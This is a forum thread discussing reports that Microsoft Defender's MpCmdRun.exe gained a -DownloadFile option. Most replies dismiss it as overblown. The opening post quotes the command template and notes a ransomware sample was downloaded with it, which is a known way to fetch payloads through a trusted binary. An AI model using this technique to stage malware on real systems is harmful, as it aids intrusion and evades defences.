A Microsoft Defender update can allow an attacker to download malware to a victim PC

[captain_to_fire]

Summary

A Microsoft Defender update can allow an attacker to download malware to a PC using command line

 

Quotes

Quote

Discovered by security researcher Mohammad Askar, a recent update to Microsoft Defender's command-line tool now includes a new -DownloadFile command-line argument. This directive allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location using the following command:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

 

In tests conducted by BleepingComputer.com, this feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9.

 

 

As you can see below, BleepingComputer was able to download the resources.exe file, the WastedLocker Ransomware sample used in a recent Garmin attack.

 

The good thing however is that as long as Windows Defender knows about the piece of malware, its going to be detected and blocked. So far, I haven't seen a blog post from Microsoft acknowledging this nor there was any CVE details posted in MITRE. While it's a good thing that even though the Defender command line can be used to download malware, it can still post a risk. By no means I am a security researcher but I can't help but think this bug can be used to execute and elevate privileges as shown in the MITRE ATT&CK framework below.

 

 

The reason Microsoft added such functionality is quite odd, it could be for pen testers or security researcher but I think this functionality should be turned off for most users who use Windows Defender as their antivirus of choice. Such attacks may not be a problem for large enterprises as those can afford an EDR sensor, internet gateway proxies and a team of security researchers but for small businesses and most consumers, it could pose a problem imo as these could also be a victim of targeted attacks too. Askar said however on Twitter that even if the command line was able to download a piece of malware, it will not execute on its own. I'm guessing that this attack requires the malefactor having the PC in their hand but as far as I know, there are ways to launch PowerShell or elevated command prompt remotely.

 

Sources

Twitter (@Mohammad Askar), Bleeping Computer

[williamcll]

Or you can just not use windows.

[WereCat]

14 minutes ago, williamcll said:

Or you can just not use windows.

no 

[captain_to_fire]

17 minutes ago, williamcll said:

Or you can just not use windows.

tell that to businesses and government offices who use Windows since the 90s

[SansVarnic]

25 minutes ago, like_ooh_ahh said:

government offices who use Windows since the 90s

They still use Windows 7, so this doesn't affect them much anyhow.

[leadeater]

Well like, you can download files using your browser, cmd, PowerShell etc etc so I'm not really seeing a security risk here? Not sure on the purpose of the DownloadFile switch on the program but I doubt it's used for any definition updates or the AV engine, that's already covered a different way. Wouldn't be surprised if the purpose is to be used for downloading files so that Defender scans them and rates them on the spot. Sadly the documentation doesn't currently have DownloadFile in there so we don't have the description of what Microsoft intends for that switch.

https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus

 

Either way this seems a little bit blown out of proportion, it's not adding any risk and multiple other programs and system tools allow you to do the exact same thing. Here's a good idea, don't download viruses, don't run random scripts, if something asks for administrative permissions that you did not expect close the dialogue (don't even click no unless you have to).

 

The reason there is no CVE, and likely never will be is because it's not a vulnerability, people doing dumb things with given tools don't get given CVE's.

[RejZoR]

40 minutes ago, leadeater said:

Well like, you can download files using your browser, cmd, PowerShell etc etc so I'm not really seeing a security risk here? Not sure on the purpose of the DownloadFile switch on the program but I doubt it's used for any definition updates or the AV engine, that's already covered a different way. Wouldn't be surprised if the purpose is to be used for downloading files so that Defender scans them and rates them on the spot. Sadly the documentation doesn't currently have DownloadFile in there so we don't have the description of what Microsoft intends for that switch.

https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus

 

Either way this seems a little bit blown out of proportion, it's not adding any risk and multiple other programs and system tools allow you to do the exact same thing. Here's a good idea, don't download viruses, don't run random scripts, if something asks for administrative permissions that you did not expect close the dialogue (don't even click no unless you have to).

 

The reason there is no CVE, and likely never will be is because it's not a vulnerability, people doing dumb things with given tools don't get given CVE's.

People must be really young and we must be really old... Such commands were VERY common for use in file download managers which triggered file scanning upon file download in the download manager. You could also supply this for on-demand scanning of files in P2P software.

 

What shocks me more is that "security researcher" found it and was baffled by it. I can only assume the guy is really young and has never seen a file download manager...

[vanished]

Either I'm missing something big here or this has been blown totally out of proportion.  If an attacker is able to run commands on your PC like this to make your PC download something they want you do have, you're already infected/compromised, so that feels like a catch 22.  Moreover, the ability to download a file with the command line doesn't seem unusual to me... have they not heard of wget?

[SansVarnic]

2 hours ago, leadeater said:

this seems a little bit blown out of proportion

3 minutes ago, Ryan_Vickers said:

Either I'm missing something big here or this has been blown totally out of proportion.

I would agree with this conclusion. I do not believe I could add more.

[Master Disaster]

So a program in Windows has the ability to pull files from the internet? Add it to the list of pretty much every program you install these days.

 

How about he shows us the ability to pull and execute an exploit without triggering the system AV RTP, you know, since he's apparently a security expert.

 

1 hour ago, Ryan_Vickers said:

Either I'm missing something big here or this has been blown totally out of proportion.  If an attacker is able to run commands on your PC like this to make your PC download something they want you do have, you're already infected/compromised, so that feels like a catch 22.  Moreover, the ability to download a file with the command line doesn't seem unusual to me... have they not heard of wget?

And this as well, to even trigger the download at all someone must already have control of the target.

[StDragon]

FTP command called. It wants the limelight again. 

[Ashley MLP Fangirl]

you can download on linux too? and Mac? using commandline? idk why this is important? 

[leadeater]

4 hours ago, Ryan_Vickers said:

Either I'm missing something big here or this has been blown totally out of proportion

Considering the only "big" tech publications that have reported on this are Bleeping Computer and Tom's Guide (plenty of smaller ones have too) I think the ones that stopped and actually thought about this figured out it's a non event. I know I'm already skeptical about this but I'm not exactly seeing much wide spread reporting on it so 

 

Feels more like "getting your name out there" than a security risk that has merit, name of the game though in the security field if you want to be more than just an employee of a security firm doing standard contract work.

[ApexMeteor]

no worries, I'll simply disable Defender...oh wait